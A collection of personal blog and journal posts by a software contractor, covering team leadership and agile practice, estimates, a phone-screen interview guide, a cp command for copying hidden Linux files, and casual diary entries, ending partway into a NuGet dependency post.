1. What pressures are being placed on a contributor to behave a particular way, where is that coming from? E.g. is a delivery manager pushing for raw speed and that being interpreted as a need to skip test coverage and just ship bare production code. In that case perhaps some conversations about the tradeoffs being invisibly made are all that it would take, and some defense of the fundamentals that drive the need for "best practice" in the first place (e.g. regression-proofing to allow continuous delivery, and confidence in refactoring to support agility and ongoing quality, see also [XP](https://en.wikipedia.org/wiki/Extreme_programming))
2. Is there a lack of knowledge as to why this good practice is beneficial to the project? If so some mentoring and coaching might be in order. Maybe as part of some pair programming exercises.
3. Provide formal training (perhaps Pluralsight courses) to fill in the knowledge gaps. Particularly for permanent employees. For contractors perhaps a suggestion of courses they could take to level-up.
4. Communicating to those involved in line management / supplier management the concerns with not meeting the standards the rest of the team are able to achieve. Discussing additional ways of providing support to enable the individual to level-up.
5. Finally and this is not a preferred option due to the disruption it causes make the call to formally put someone on a formal improvement plan or move them on.
#### The coaching ladder
Inspired by [Developing Leadership podcast episode 19 about a strong engineering leadership culture](https://www.developingleadership.co/episode/episode-19-transitioning-from-a-holacracy-to-a-strong-engineering-leadership-culture-with-katie-wilde-from-ambassador-labs#).
Different people, cultures and neurological wiring need different ways of setting out expectations. A two-pronged approach of gentle coaching + clear expectation & consequence setting seems to cover all bases.
1. Listening mode - make sure people are heard in groups and one-on-one
2. Gently coach expectations - "have you thought about doing x?" / "I observe that your PR descriptions average 10 words" / "here's how writing clear PR descriptions helps your valuable ideas be recognised by the team"
3. Set out consequences of not meeting expectations - "We require excellent communication in pull requests to the standard of [example]" / "this standard is a requirement of continuing to be a senior engineer here"
#### One-minute manager
Where course correction is needed (when operating more as a line-manager) [The (new) One Minute Manager](https://www.amazon.co.uk/New-One-Minute-Manager/dp/0008128049) offers some great advice on keeping it simple and clear for all involved. This suggests that one-to-one interactions take the form of:
1. One-minute on goals
2. One-minute on praise
3. One-minute on redirection
If doing only three minutes of this means they can be done more often and more reliably with the whole team this is a win, as often the opportunity for this kind of discussion is lacking due to the pressure to ship. It's important to note that this doesn't mean the relationship has reverted to command and control, only that clear expectations are important for everyone's success and happiness.
### Current "Best Practice" and Lofty Goals
Things we should strive towards doing/having.
* Great test coverage
* 100% unit test coverage (in meaning not just in line count)
* Why? Because this enables refactoring with confidence, reduces the chance of regressions and encourages good design (e.g. decoupling, SOLID etc.)
* Use TDD (Test-Driven Development)... if it's the right tool for the job. TDD is a useful technique to be sure. It's harder to use when you can't picture the shape of what you are going to create in your head in advance which I think is probably its biggest weakness. The ultimate objective is that it should be impossible to change the intended behaviour of a production code without a test failing. TDD helps with this but isn't the only way. Another way is to alter the behaviour temporarily (locally) after the code is written and make sure the tests do actually fail. So long as the output coverage is good then I don't personally think that being religious about TDD is especially helpful. I think it's a technique that all developers should learn and practice, whether or not they use it for every piece of code they write.
* Smoke tests
* Some kind of end-to-end "did we break anything critical" that runs on real infrastructure. This usually requires dedicated effort to create beyond the tests created during individual feature work. I recommend putting this in the backlog and ensuring it is scheduled as it's too big for a hero-developer to "just do" unless you've completely lost control.
* [Visual regression testing](https://www.browserstack.com/guide/visual-regression-testing) - in anything with a UI this can catch regressions and unintentional changes that would be hard to catch.
* ["BDD" (Behaviour Driven Development) aka specification by example](https://www.agilealliance.org/glossary/bdd/)
* A tool for a job. Use it where it's useful such as allowing business analysts to create and validate example scenarios for complex calculations or flows. Beware of the overhead of example wiring code.
* Often confused with UI tests due to coincidental timing of creation with browser-automation. BDD is not the same as UI testing, mkay?
* The point of BDD is more that it's a user/business need focussed description of what the software is supposed to do that's then made executable through a translation layer. Do not forget this.
* You can get a lot of the benefit of BDD by [just writing test method names in the BDD style](https://www.futurelearn.com/info/blog/how-we-write-readable-feature-tests-with-rspec), such as `def the_order_total_should_be(total_price)` and then chaining them together in a top level "scenario" method just like you would with gherkin but without all the example parsing overhead.
* Continuous delivery (and confidence to ship any time without even looking)
* [Lights-Out delivery](https://sdtimes.com/devops/going-lights-out-with-devops/) - i.e. never having to manually interact with production servers. Related to configuration-as-code etc.
* Use feature flags (related to the true meaning of the oft misused phrase "continuous integration") to avoid long-lived feature branches for things you can't release to the users yet.
* Use the best type of project management (yes I used the dirty words!) for *your* project.
* Agility:
* Methodologies are fine, but the point is to be able to be responsive to changing knowledge and business requirements. Never forget that.
* [eXtreme Programming](http://www.extremeprogramming.org/) - an important piece of the landscape, with a focus on technical approaches that allow agility (always shippable, fully tested, etc.)
* [Scrum](https://www.scrum.org/resources/what-is-scrum/) - a good basis for all projects, especially greenfield development
* Kanban - better for maintenance mode projects
* It's very important to understand "Work In Progress (WIP) limits" regardless of whether you use kanban or not. [This video explains wip limits](https://youtu.be/W92wG-HW8gg) in a way that is easily understandable. The mathematically truth of wip limits will always be counter-intuitive to my monkey-brain I think. In short, throughput matters more than utilisation of each person/resource.
* Lean
* [Flow](https://flowacademy.io/what-is-flow/)
* [Scaled Agile (SAFe)](https://www.scaledagileframework.com/) for multi-team agile
* ShapeUp from basecamp is inspirational. It's a refreshing change from scrum. I wrote [a summary of ShapeUp](/2019/11/26/time-to-shape-up-your-scrum-process-the-new-thing-from-basecamp/) which, in my humble opinion, is worth a read.
* Waterfall is bad. Period. Gantt charts are to be treated with suspicion, along with anyone and anything else that promises complete predictability of software development.
* Self-directed teams that own their results and can use appropriate methods for their particular challenges are far more effective than standardization.
* Personally I like some kind of blend of scrum and kanban, and definitely no story pointing.
* Lightweight agile governance:
* Stakeholders showing up to sprint demos (show-n-tell) is much more time-efficient and more powerful than written reports.
* Ability to rebuild entire estate from source-control:
* Binaries
* Infrastructure (configuration-as-code)
* DevOps in practice not just in name (the development team **owning** production)
* This implies a diversity of skills within the "development" team.
* Assistance from people with expertise outside the team is of course welcome, but the important thing is the team continues to own their own outcomes.
* Some (but not complete) harmonization of technology choices:
* Largely consistent technology makes hiring and moving around projects easier
* Completely consistent technology prevents using the best tool for the job
* Following [12 factor principles](https://12factor.net/).
* Pushing beyond the original 12 factor principles - [Small Batches podcast episode 7](https://smallbatches.fm/7/)
* Continuous improvement (of the team, the processes and the system being built)
* Pair/mob programming.
* Collaborating on just about everything ensures no-one is a single point of knowledge for any one thing.
* The sharing of knowledge, skills and techniques improves everyone's skills as we go.
* Many problems and bugs are caught even before `git add` has been run. The later a problem is found the more it costs to rectify it.
### Estimates
*Story points, t-shirt sizes, predictions, time-based estimates and no-estimates.*
This is a topic that always causes heated debate with lots of dogma on all sides. Experiences of day-long point-guessing sessions leave developers who just want to ship nervous of anyone who mentions the word estimate or point. Project owners/managers get nervous when they have no idea how much they are about to spend. Deadlines can be real or made up. Cost/benefit decisions have to be made. So what should we do?
I say it depends. And more usefully, **only create estimates if you can prove you need them**, and then use the most lightweight way you can come up with of getting just enough information to make a call and go back to cutting code.
Creating estimates has a cost, make sure you know you need it otherwise don't pay the price. Kanban calls this "[waste](https://kanbanize.com/lean-management/value-waste/7-wastes-of-lean)" (i.e. anything that doesn't end up in the final product, which definitely includes estimation work).
[Avoid story points](https://ronjeffries.com/articles/019-01ff/story-points/Index.html) - they were basically invented as a way to prevent people mistaking **estimates** for **commitments** but have taken on a horrifying life of their own. I have *never* seen them be particularly useful in any of the many projects I've been on, and I have regularly seen them be a big cause of pain, wasted time and discontentment.
Genuine reasons for needing some kind of estimate:
* Big-feature prioritization - use t-shirt sizes (small, medium, large, elephant)
* Can't miss deadline (I arrived on a project when the release date of a non-existent thing had already been announced by the managing director to all the customers). Do as few of the following as you can: (listed in increasing order of cost and decreasing order of preference.)
* A "finger in the air" hunch for viability of the project from an experienced engineer
* Consider just doing the minimum viable product (MVP) first and then adding nice to haves once that's done (iterate). Focus on always-shippable.
* If you are concerned even the smallest viable thing might not be doable then you might have to create some architecture designs and prototypes up-front to reduce risk of discovering complications later.
* If time is tight and even the MVP is looking uncertain then you might have to create actual estimates for more detailed tasks to give you a better idea of the options ahead of you. I have actually done this on a fixed-deadline project. It's time consuming and dangerously waterfall but it might be your only choice. The more granular the task list the more accurate the estimate (it helps compensate for human bias), but on the flip side the more detail you create without building the more likely you are to be wrong about the design and tasks and for it all to be a waste.
Planning releases - do you *really* need to do this give the cost? Consider using feature-flags instead to hold back features if you need to time their release.
If you need to forecast based on points [use monte-carlo story-point forecasting as implemented by <NAME>](https://christopher-bimson.github.io/blog/2017/04/19/forecaster). While I like this approach I'd challenge the need for the forecasts in the first place before committing to the significant extra overhead of calculating and tracking points and then turning that into forecast.
### Staying sharp
Even though I accidentally led a couple of teams early in my contracting career I didn't at that point fancy moving "up" the ladder. I had seen people become "dev team managers" and rapidly lose all their technical skills through a combination of atrophy and the never-ending churn in state-of-the-art technology and practice. I certainly didn't want to end up us a mediocre manager with mediocre and outdated tech skills. So I put my head down and kept on coding as an "individual contributor" (sometimes referred to as an I.C.). Since then I've learned and seen some tricks that I think can allow people to stay sharp no matter how high they climb.
#### The pendulum
By alternating roles you take on between individual contributor (coder) and team lead roles you can keep the experience of coal-face high-pace shipping fresh whilst also giving more value by helping whole teams succeed.
<https://charity.wtf/2017/05/11/the-engineer-manager-pendulum/>
#### The non-critical-path task
I tried picking up a story from the sprint when I was leading a team once. It didn't go well but I didn't know any better. Because my primary goal was team enablement and my time was interrupt-driven I'd end up with the team waiting for my piece to get done. Not a great help to the team's delivery speed. I also found with the team being full time on code and me less than full time I was always just that little bit behind on current thinking in the heart of the codebase, and you don't have to be much out of step to be much less productive or cause more problems than you solve.
Since then I've seen two great approaches implemented by others:
1. Take on a non-critical but useful coding piece that won't block the team. I watched an amazing product owner (who can also code) built an entire support console microservice while us devs built the main production app. This gave huge benefit of allowing the support folks and BAs to self-serve on things we didn't have time to build to production grade. It kept him close to the actual product. It also kept his Ruby on Rails skills current and sharp. Ace. I shall be copying this trick!
2. Work on enablement pieces. Make sure CI pipelines are flowing well. Do version upgrades. Tackle bugs that haven't made the team's sprint. I've seen a team lead do this effectively and would recommend.
### Interviewing / filtering
Not everyone gets this luxury but being allowed to control who works in your team will do more for your ability to succeed than anything else.
For a phone screen I wrote up my process here: [Technical phone screen interview questions](/2021/12/10/technical-phone-screen-interview-questions/).
Beyond a quick phone/video screen my favourite approach is a pair-programming exercise as this is such a rich source of information and matches how we actually get things done.
### Coaching & mentoring
I can't say it better than [The Coaching Habit by <NAME>](https://www.amazon.co.uk/Coaching-Habit-Less-Change-Forever/dp/B01HH7IZCI). The follow-up book [The Advice Trap](https://www.amazon.co.uk/How-Tame-Your-Advice-Monster/dp/1989025757) is also excellent.
I've often been guilty of unloading all my "knowledge" on others before they've even asked. Now I see the error of my ways and instead as per the book look to nudge and help at people's own pace. Being there to assist and give confidence as needed; leading people to the best answer through questions instead of answers (and being happy to be surprised that it's a better answer than I had in mind).
### Decision making
It's good to have single points of responsibility such as a tech lead or project owner, however that doesn't mean that it's top down control.
As for how to make the best decisions in chaos and complexity, or when thinking seems to have narrowed to group-think this is an excellent guide: [Decisive: How to Make Better Choices in Life and Work by Chip & Dan Heath](https://www.amazon.co.uk/Decisive-Make-Better-Choices-Life/dp/0307956393)
### Things to read / watch / listen too
* Blog posts
* [Maker's Schedule, Manager's Schedule by Paul Graham](http://paulgraham.com/makersschedule.html)
* [Being Glue post/talk by <NAME>](https://noidea.dog/glue)
* [Command and Conquer and the Herd of Coconuts by <NAME>](https://www.joelonsoftware.com/2000/03/23/command-and-conquer-and-the-herd-of-coconuts/)
* [Normalization of deviance by <NAME>](https://danluu.com/wat/)
* Tech leadership books
* [Notes to a Software Team Leader: Growing Self Organizing Teams by <NAME>](https://www.amazon.co.uk/Notes-Software-Team-Leader-Organizing/dp/829993320X)
* General leadership & communication books
* [The Advice Trap: Be Humble, Stay Curious & Change the Way You Lead Forever by <NAME>](https://www.amazon.co.uk/Advice-Trap-Humble-Curious-Forever-ebook/dp/B083YZTW4B)
* [5 Dysfunctions of a Team](https://www.audible.co.uk/pd/The-Five-Dysfunctions-of-a-Team-Audiobook/B004EXKC5M)
* [The First 90 Days](https://www.audible.co.uk/pd/The-First-90-Days-Updated-and-Expanded-Audiobook/B00CDW0EX6)
* Personal development (you'll need this for you and your team!)
* [Daring Greatly by <NAME>](https://www.amazon.co.uk/Daring-Greatly-Courage-Vulnerable-Transforms-ebook/dp/B00APRW2WC)
* [Nonviolent Communication; <NAME>](https://www.amazon.co.uk/Nonviolent-Communication-Create-Relationships-Harmony/dp/B00TIWFAV0/)
* [Bonds That Make Us Free; <NAME>](https://www.amazon.co.uk/Bonds-That-Make-Free-Relationships/dp/B07N149VZK/)
* [48 Laws of Power; <NAME>](https://www.amazon.co.uk/48-Laws-of-Power/dp/B00WYRC0L4/)
* Lean / Flow / Kanban agile etc
* [The Goal: A Process of Ongoing Improvement Kindle Edition
by <NAME>](https://www.amazon.co.uk/Goal-Process-Ongoing-Improvement-ebook/dp/B002LHRM2O) (Audible version has sound effects and everything!)
* [WIP: why limiting work in progress makes sense (Kanban) (YouTube)](https://www.youtube.com/watch?v=W92wG-HW8gg)
(Personally I like Audible books, I think it sinks in better being told the stories by another human voice)
### Who to learn from
* The legend of [<NAME>](https://www.joelonsoftware.com/) - I've been reading his articles since I first started coding. Remember "[the joel test](https://www.joelonsoftware.com/2000/08/09/the-joel-test-12-steps-to-better-code/)"?
## Other ways of moving "up"
These days thankfully moving into management isn't the only way to get a pay raise in many organisations. Places have recognised that getting ever deeper into technology is in itself valuable, spawning titles such as "principle engineer" that carry the weight and renumeration to match the value and experience of a coder who has seen many things and developed many other skills beyond pure coding.
There's also the "architect" route where you can be an expert in deciding what to use and how to put it together from the seemingly infinite choice of technical solutions, patterns, services and infrastructure that will solve pretty much any given problem. There's good money to be made being an architect, if nothing else than because your power to royally screw everything up for everyone that comes after you is probably about as high as it gets in this role! (Yes I've been on the receiving end of good and bad "architecture").
The road to CTO. You can join a small startup and ride the explosive growth, ending up with many engineers and services under your control. Or you can work your way up relentlessly in one or more large organisations.
## Me, a leader?
### Why me, why now, why this?
I'd like to build a product, but I can't just stop contracting and hope for the best. As such I've spent some time considering which direction I should take my contractor life.
When considering changes of career direction I highly recommend [the book "Working Identity" by <NAME>](https://www.amazon.co.uk/Working-Identity-Unconventional-Strategies-Reinventing-ebook/dp/B004OEIQ7C) which lays out a framework for thinking about the journey of the change, combined with lots of research and stories of others who've faced the chasm (often but not exclusively in the traditional mid-life point).
Here's some ideas that popped up ("identities to try on" in the terminology of the book):
* **Systems-integration agency/consultancy** - I had a go at this but seems to be too big a jump for me right now, on the plus side it's kicked off another period of learning and self-development for me and is the reason I hired a [business coach](https://businesscoachdirectory.com/coaches/) which I am eternally grateful for.
* **Become a "frontend" engineer** - Traditionally I've been a "full stack" or "backend" engineer which fits my engineering strengths of dealing with complexity in code (for example [tech debt as discussed here](/2020/07/09/approaches-to-refactoring-and-technical-debt/)). Way back there wasn't much complexity beyond a bit of jQuery in most frontend things, in fact I didn't come across the frontend/backend specialization for many years. For a long time the designers-who-can-html dominated frontend land. But these days with ES6, Typescript, npm, angular, react, etc. etc. there is now endless complexity on the frontend for someone like me to get my teeth into. With that in mind (and with a view to improving my ability to ship side-projects) I've been updating my languishing frontend skills. (There's not much frontend in my recent work for UK Gov as that's pretty much templated out with the [gov.uk design system](https://design-system.service.gov.uk/), and accessibility concerns means that fancy responsive SPAs don't tend to pass muster). Having put the idea out there with recruiters etc. but not getting much interest I think it's probably a jump too far in one go, but either way I'll spend some spare time skilling up.
* **Lead developer** - I don't really know why I didn't think of this sooner, it's actually a good fit for where I've been and where my life is at now. This is my current identity to try on, wish me luck! The rest of this post is about this.
Here's why I like the team lead idea right now:
I think can provide more value as a contract team-lead for dotnet delivery teams. I can still crank code, and still enjoy coding, but helping a whole team succeed is a worthy thing.
The higher rates would make up for it being a less commonly available role (there's always at least two individual contributors for every team lead, and leads are less commonly contractors). And I could always fill in with coder work in any gaps.
Thinking back to my history and current position, I've enjoyed the lead roles I've done, I love enabling those around me, and I've learned some tricks for being able to stay close to the tech without getting in the way (see "staying sharp" above). I can still crank code, but it seems a shame to learn everything I have beyond the code and then not put it into practice.
### Experience leading
One of my earliest contracts was a project where I was brought in as a solo dev with a view to delivering an asp.net project. The first task was to collect the requirements from a sales person (not an end user or user researcher sadly but that's how it was). So armed with my new love of [balsamiq mockups](https://balsamiq.com/) I set about turning the explained needs into a set of wireframes, using them as a tool for a tool for discussion and iterating them as I better understood the problem at hand. I then started work building. After some time the CTO sauntered over and casually asked how likely we were to meet the publicised launch date now that we understood what needed to be built. "Zero" I said, as this was quite a sizeable thing on a not particularly long timeline. A lovely chap to work with he didn't pass further comment and disappeared again.
Not much later I found myself with a team to work on the project consisting of a mix of permanent development staff who'd been reassigned to the project. Because I was there first and I was in touch with the people relaying user's needs I was naturally the hub for the team. Additionally I was one of the few who'd practiced agile methods in previous roles. The result was I felt it was far more important that I enabled the rest of my team to be as productive as possible by eliminating things that were blocking them as my top priority. So there I was, being a team lead for a dev team building a new product, making sure everyone was able to get on, talking to stakeholders and running our sprint demos to ensure everyone inside and outside the project team understood how it was going and could play their part. Pleasingly we shipped a usable system in time for the deadline.
### Experience mentoring
I've always helped everyone I can be the best they can, freely sharing knowledge with anyone who's interested. Not just developers either, in my view the more non-technical roles know about the thing we're all working on the more effective they can be.
I officially mentored DfE Digital's first civil-servant developer which was a real pleasure. You can hear a bit more about that on [my podcast episode "A retrospective of mentoring, with <NAME>"](https://pod.timwise.co.uk/10)
## Summary
Well that was a lot more than I expected when I sat down to write, guess there's a lot floating around my head after 21 years thinking, doing and learning.
Wish me luck, and I hope this helps you in some way.
If you want my help with a team just get in touch, I'm always happy to chat.
<file_sep>---
title: "pointless acronyms"
date: 2005-05-13
slashdot_url: https://slashdot.org/journal/106752/pointless-acronyms
---
<p>to celebrate being unblocked, here's a list of interesting acronyms of "timothy abell"</p>
<p>Hot Meaty Bill<br>I'm the tall boy<br>Ah be tit molly<br>Ah ibm to telly<br>Toby a h millet<br>Thai be my toll<br>Hallo im betty<br>My halo be tilt<br>Bye to ill math<br>Let my hat boil<br>Bet i'm thy lola<br>Thy lola bit me!<br>Totally be him<br>Me hit tall boy<br>Lay the to limb<br>Am bill the toy</p>
<p>So there.</p>
<file_sep>---
title: "more pics"
date: 2004-08-19
slashdot_url: https://slashdot.org/journal/80837/more-pics
---
<p><a href="http://www.timwise.co.uk/images/IMG_4042.JPG">here</a></p>
<file_sep>---
title: "This weekend"
date: 2004-03-14
slashdot_url: https://slashdot.org/journal/65206/this-weekend
---
<p>This weekend went extremely well.<br>Friday night me and Mr T had an excellent curry at the <a href="http://www.readingrestaurants.com/Haweli/">Hawelli</a>, shame no one else came but it was good anyway, hospitality was excellent as usual, and Juggy was down there, which was nice.<br>Saturday morning = sleep. Got up in time to go outside and get hailed on. (ow, ow ow ow, ouch!). Then I cycled into Reading and bought some new shoes (-: (pwetty dress - <a href="http://www.weebl.jolt.co.uk/shoes.htm">[context]</a>).<br>Karaoke at the local - yay, much drunkenness.</p>
<p>Today, pub lunch with folks. A quick jog in the new shoes, then more sleep.</p>
<p>Congratulations to Joel & Ritu:<br>See <a href="http://www.jmansford.f2s.com/Jai/">this</a> and <a href="http://www.photobox.co.uk/public/detail.html?c_album=612927">this</a>.<br>Utterly adoreable.<br>(I work with Joel, for those who don't know)</p>
<file_sep>---
title: "geek here"
date: 2005-11-09
slashdot_url: https://slashdot.org/journal/121708/geek-here
---
<p>My second note on code project:<br><a href="http://www.codeproject.com/script/profile/whos_who.asp?id=1037965">http://www.codeproject.com/script/profile/whos_who.asp?id=1037965</a></p>
<p>Code project is possibly the slowest site ever.</p>
<file_sep>---
title: "Swimming"
date: 2004-03-20
slashdot_url: https://slashdot.org/journal/65813/swimming
---
<p>Not a bad week on the excercise front. Was planning to swim all five days. Managed four, but failed on wed due to brain failure leading to lack of trunks at swimming pool (and no, I was not going to swim without them, or in my boxers as some have suggested). Got back in and went for a two and a half mile run, which was good, then Miss S came over and was person number two to grace my new sofa (not in the bed configuration I might add), number one was Mr T (a good friend of Miss C). Persons three and four were the folks, (hello folks!) Mr & Mrs A during random visit for cup of tea and curry.</p>
<p>Weather: Pissy.<br>Motivation: Food and sleep.</p>
<file_sep>---
title: "<NAME>"
date: 2003-12-05
slashdot_url: https://slashdot.org/journal/54225/eddie-izzard
---
<p>Yay for eddie izzard at the Birmingham NIA.<br>Yay for not enough sleep.</p>
<file_sep>---
title: Taking an idea from business concept to software implementation
layout: post
---
This post is my explanation of a concept I got from someone far more intelligent than me, and I've written it here in my own words as much to see if I can understand, explain and refine it as to share it with you lovely people. When one person teaches two people learn, as they say.
## Context
Sometimes you are taking instructions from someone who deeply understands technology and how to design and iterate delivery of software systems. This blog post is **not** about that situation.
This post is for when the people with the business knowledge don't know how to run digital projects themselves, and that's why you're here.
It's also **not** a post about an individual technologist doing the whole thing, listening to the business and then building what they need; in that case you need far less formal process.
This approach is for software engineering **teams**, which means the business knowledge has to be transferred effectively into many heads. System design and implementation is in this case a collaborative engineering effort.
## Method
1. Business folks ensure they have an idea of what their needs are, the relevant context and are ready to explain and document it for engineering teams.
1. Run a workshop where "the business" shares with the delivery team the business requirements they have gathered in their preparation for the work plus the context for the needs (i.e. the "why").
1. The goal is to create a common understanding of what the business needs without getting into technical design or product increments / stories / tasks.
1. The outputs of this exercise should be living documents that can be referred to and refined as project delivery continues and understanding evolves.
1. This is a collaborative exercise, with the engineering delivery team actively probing and challenging and the shared artifacts being refined with the new understanding.
1. Don't forget "unhappy" paths as well has the more obvious "happy" paths, plus non-functionals like capacity, latency, cost, design, UX etc.
1. Explanatory diagrams, journey maps and data journey maps are preferrable to bullet lists and prose as they encourage the right level of detail and help avoid solutionizing.
1. Check out [Miro](https://miro.com/) & [Lucidchart](https://www.lucidchart.com/) to assist with sharing this understanding, as well as whiteboards, Post-its, index cards etc.
1. Run a technical design session with the technical team to plan out the design of the system and a route to delivery at a high level. The business do not need to be present but may need to be consulted for clarifications of the above business needs.
1. Present the design back to the business to flush out any issues and further refine understanding of the business needs. Iterate as necessary.
1. Produce user stories that represent independently deliverable capabilities. (Only as much as you need right now for planning and delivery, let's not turn this in to waterfall!) ... With these user stories you can then:
1. Estimate the delivery effort required (complexity, t-shirt sizes, story points etc)
1. Prioritise them based on estimated cost versus value delivered.
1. Prioritise things by the risk involved (e.g. "this is completely unknown so let's spike this first to reduce delivery risk")
1. Figure out what depends on what and order delivery based on that.
1. Decide what should be delivered versus what should be dropped. (A [Product Owner](https://timwise.co.uk/2019/07/08/why-every-team-needs-a-delivery-manager/#aside-product-who) decision)
1. Only once this shared understanding of the business needs and context plus system design is in place do we proceed to delivery of the user stories in whatever way the engineering team sees fit. Presumably some kind of agile/scrum/xp kind of thing.
<file_sep>---
title: "Swimming"
date: 2003-12-02
slashdot_url: https://slashdot.org/journal/53812/swimming
---
<p>Yay! I swam this morning. Well done me.<br>I managed about three complete lengths, in 45 mins.<br>My god I'm soo unfit. Well, at least the only way is up.</p>
<file_sep>---
title: "Swimming"
date: 2003-12-16
slashdot_url: https://slashdot.org/journal/55282/swimming
---
<p>Been swimming again this morning. Got up in time today so had 45mins in the pool, and managed a staggering 25 lengths (625 metres).</p>
<p>I'm quite pleased with that. And as usual celebrated with a cup of tea in the local cafe. This morning I was joined by my gorgeous assistant, R.</p>
<file_sep>---
title: "copying all (hidden) files in linux with cp"
date: 2005-09-29
slashdot_url: https://slashdot.org/journal/118511/copying-all-hidden-files-in-linux-with-cp
---
<p>One of my old pet hates in Windoze is the default explorer setting to hide system files, which means you don't get everything when copying stuff.</p>
<p>In linux, a hidden a file or directory is anything that starts with a dot.<br>So, I want to take a copy of my ~/ (home, like windoze profile), hidden files and all.</p>
<blockquote>
<div><p> <tt>cd<nobr> </nobr>/home/tim<br>cp -r<nobr> </nobr>./*<nobr> </nobr>/mnt/otherhdd/stuff/timshome/</tt></p></div> </blockquote>
<p>Look with ls -l, no hidden files. hrmm.</p>
<p>Only thing I could find was this:<br><a href="https://www.redhat.com/archives/fedora-list/2004-October/msg01760.html">https://www.redhat.com/archives/fedora-list/2004-October/msg01760.html</a> </p>
<blockquote>
<div><p> <tt>cp -r<nobr> </nobr>.??*<nobr> </nobr>/mnt/otherhdd/stuff/timshome/</tt></p></div> </blockquote>
<p>Seems a bit clunky to me.<br>Anyone know a better way? Like cp -rh or summat.</p>
<file_sep>---
title: "and paypal aren't looking too hot"
date: 2005-06-12
slashdot_url: https://slashdot.org/journal/109166/and-paypal-arent-looking-too-hot
---
<p><a href="http://www.paypalsucks.com/">http://www.paypalsucks.com/</a><br>erk, think I'll extract my money pronto<br>I shall be looking into these alternatives: Amazon,Yahoo,Onsale,2good2toss</p>
<p>Really it seems where ever you go there are scare stories. I've heard of cahoot freezing an account without good reason and being really shit about it when contacted. The whole thing makes me want to keep my cash under the mattress.</p>
<file_sep>---
title: Technical phone screen interview questions
layout: post
---
I was tasked with giving an initial assessment of technical competence / fit in a 30 minute phone call. Ideally I'd like
This tech screen is based on [Steve Yegge’s "The Five Essential Phone-Screen Questions"](https://sites.google.com/site/steveyegge2/five-essential-phone-screen-questions)
My lightweight version goes something like this:
## 1) Coding
Ask them to describe the code for a console app that prints the ten-times table in a grid. This is intended to get them to describe a nested for loop, or maybe some fancier construct. It doesn’t matter if they nail it, you can tell if they understand how to code from how they talk about it. Bonus for whether they can understand a verbal description (possibly imperfectly described), and throw together a solution in their head.
This isn’t a substitute for an in-person pairing session, but it gives a quick indication whether they have a clue how to code.
It's supposed to be something like this, which is remarkably hard to explain on the phone from my side (no points deducted for my inability to be clear!):
```
1 2 3 4 5 6 7 8 9 10
2 4 6 8 10 12 14 16 18 20
3 6 9 12 15 18 21 24 27 30
4 8 12 16 20 24 28 32 36 40
5 10 15 20 25 30 35 40 45 50
6 12 18 24 30 36 42 48 54 60
7 14 21 28 35 42 49 56 63 70
8 16 24 32 40 48 56 64 72 80
9 18 27 36 45 54 63 72 81 90
10 20 30 40 50 60 70 80 90 100
```
## 2) OO design (and other structures)
Ask them to describe how they can arrange their code, giving a hint that I’m after object oriented things. I’m looking for a confident off-hand description of inheritance, interfaces etc.
If they don’t fluff that, ask if they know non-OO approaches (composition, modules, mixins etc) that are used in languages other than C# to see how broad and deep their knowledge is.
## 3) Scripting & Regex
Context: It’s not uncommon for microsoft devs to never look outside the microsoft sandbox. This can result in someone spending week(s) writing a program to solve a problem that can be done with one linux command. Times are changing and Microsoft loves linux, but these narrow thinkers are best avoided. This question is almost pointless for ruby devs who live in unix land.
Question: you have a server with thousands of plain-text log files scattered across hundreds of folders and you need to find all the lines with a particular user-id in them to solve a production problem.
Good answer: `grep` (this means they know of unix tools, maybe probe how wide that is)
Bad answer: I’d start a new project in visual studio and use FileInfo classes…
Follow up question: what if you needed to find an identifier that matched a pattern but wasn’t always the same? (i.e. do they know about regex)
Great answer: I’d use `egrep` with a regex (or similar tools); goes on to explain a bunch of great tools I hadn’t heard of before
If they have other smart ways (e.g. they know about log aggregation tools like Kibana), guide them back to a limited toolset (“it’s a legacy system, you haven’t got any of that...”)
## 4) Data Structures
Do they know the difference between dictionaries and lists, particularly when it comes to speed of lookup.
Related: Do they know about [algorithmic complexity](https://www.bigocheatsheet.com/) - this sorts the self-taughts from the computer-science degree crowd, but if you don’t know this stuff it’ll bite you sooner or later.
See if they are aware of the available structures.
See how clearly they can explain why you’d choose one over the other for a particular piece of code.
It doesn’t matter if they can recall the specifics, it just matters that they’d think to go and look up the specifics when they needed to decide.
## 5) Bits and bytes
Do they know why you don’t store money in floating point variables?
Great: use decimal instead because floating point cannot accurately represent decimal fractions and will give you rounding errors that upset the accountants and customers
Okay: always use decimals, but don’t really know why
Bad: I’d use a float for money
---
So that’s it for Steve’s list.
I also like to ask them how they feel about the following:
## 6) Testing
Are they militant about TDD? What do they think about BDD? Are they more pragmatic?
How do they think about why you write tests.
This isn’t likely to be make or break, but might indicate better or worse fit with a team and is good to know.
## 7) Agile
What kind of agile structures have they worked in. What did they think about it.
I’m looking for enthusiasm for the way the best agile teams operate, it doesn’t matter too much if it’s SCRUM or something else. Do they seem like they’d be adaptable? Would they push for better?
Have they worked on GDS style teams? (For gov work)
## Assessment
During the debrief I usually discuss at least some of the following areas, focussing on what seems to be the make or break points:
* skill / knowledge level: architect & team lead > senior engineer > narrow senior engineer > competent > hand-holding needed > complete liability
* communication style, ability to discuss piece of theoretical code
* attitude towards tech (e.g. do they demand testing or are they more “pragmatic”)
* attitude towards and organisational structures and approaches (i.e. scrum or GDS team structures)
* how they would likely fit in with the intended team
Some example outcomes of the technical assessment might be:
* Strong - knew everything, broad knowledge, could clearly do the job
* Qualified positive - can probably build something within some boundaries, but you’d want a strong tech lead in charge to keep things on track
* Weak - lacking knowledge of important areas of tech, failed to explain a good solution to a simple nested loop problem
## Bias and scoring
To minimize risk of bias sneaking in and giving me a "favourite" based on how similar they are to me rather than how well they did I like to do a written report scoring each area above.
<file_sep>---
title: Upgrading indirect NuGet dependencies
layout: post
---
## Update - transitive pinning
It seems microsoft have produced a solution to this problem, along with the long awaited solution-level package management. Read all about it here: <https://devblogs.microsoft.com/nuget/introducing-central-package-management/#transitive-pinning>
---
## About
The state of the art for dependency management in dotnet land. Having used ruby bundler and npm this makes me cry.
I really hope I'm massively wrong about the following information. Please do tell me if I'm wrong and NuGet dependency management is not actually as bad as this!
## Paket, a NuGet alternative
If you have the option then look into replacing nuget with [paket](https://fsprojects.github.io/Paket/) for your projects as I gather this has the below problems solved.
## Indirect dependencies
